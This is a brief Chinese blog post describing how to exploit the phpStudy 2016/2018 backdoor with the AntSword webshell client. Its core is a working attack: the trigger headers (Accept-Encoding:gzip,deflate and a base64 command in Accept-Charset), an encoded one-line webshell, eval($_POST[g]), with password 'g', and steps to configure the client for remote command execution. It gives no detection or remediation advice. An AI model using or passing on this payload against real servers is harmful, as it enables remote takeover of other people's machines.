利用中国蚁剑无文件连接phpstudy后门方法

  • 内容
  • 相关

0x01描述

Phpstudy是一款PHP调试环境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者、开发者用户。

后门名称:Phpstudy后门

威胁等级:严重

影响范围:Phpstudy 2016、phpstudy2018

后门类型:C&C、命令执行

利用难度:极易

0x02复现

利用工具:中国蚁剑

phpstudy:2016 PHP-5.4.45

Image

Accept-Encoding:gzip,deflate
Accept-Charset:base64加密执行的命令
一句话木马:ZXZhbCgkX1BPU1RbZ10pOw==   
密码:g

配置HTTP消息头

Image

连接成功

Image


参考p&季风 https://www.secquan.org/Notes/1070341

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:利用中国蚁剑无文件连接phpstudy后门方法 - http://www.shungg.cn/post/259

发表评论

电子邮件地址不会被公开。 必填项已用*标注